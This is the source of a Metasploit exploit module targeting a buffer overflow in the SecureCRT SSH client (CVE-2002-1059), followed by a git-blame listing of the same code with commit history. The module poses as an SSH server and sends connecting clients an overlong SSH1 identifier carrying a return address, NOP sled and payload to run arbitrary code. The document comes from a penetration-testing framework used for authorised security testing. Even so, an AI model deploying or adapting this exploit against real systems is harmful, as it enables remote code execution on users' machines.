modules/exploits/windows/ssh/securecrt_ssh1.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SecureCRT SSH1 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in SecureCRT <= 4.0
        Beta 2. By sending a vulnerable client an overly long
        SSH1 protocol identifier string, it is possible to execute
        arbitrary code.

        This module has only been tested on SecureCRT 3.4.4.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2002-1059' ],
          [ 'OSVDB', '4991' ],
          [ 'BID', '5287' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00",
          'MaxNops'  => 0,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2002-07-23',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
      ])
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    buffer =  "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
    buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded

    print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

    client.put(buffer)
    handler

    service.close_client(client)
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::TcpServer`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
Add last chunk of fixes 2014-03-11 12:44:34 -05:00			`'Name' => 'SecureCRT SSH1 Buffer Overflow',`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a buffer overflow in SecureCRT <= 4.0`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`Beta 2. By sending a vulnerable client an overly long`
			`SSH1 protocol identifier string, it is possible to execute`
			`arbitrary code.`

			`This module has only been tested on SecureCRT 3.4.4.`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'References' =>`
			`[`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`[ 'CVE', '2002-1059' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '4991' ],`
			`[ 'BID', '5287' ],`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00",`
			`'MaxNops' => 0,`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],`
			`],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2002-07-23',`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`'DefaultTarget' => 0))`

			`register_options(`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`end`

			`def on_client_connect(client)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`return if ((p = regenerate_payload(client)) == nil)`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)`
port 2.x to 3.0 2006-12-14 13:50:59 +00:00			`buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded`

			`print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")`

			`client.put(buffer)`
			`handler`

			`service.close_client(client)`
			`end`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules 2009-07-27 14:05:23 +00:00			`end`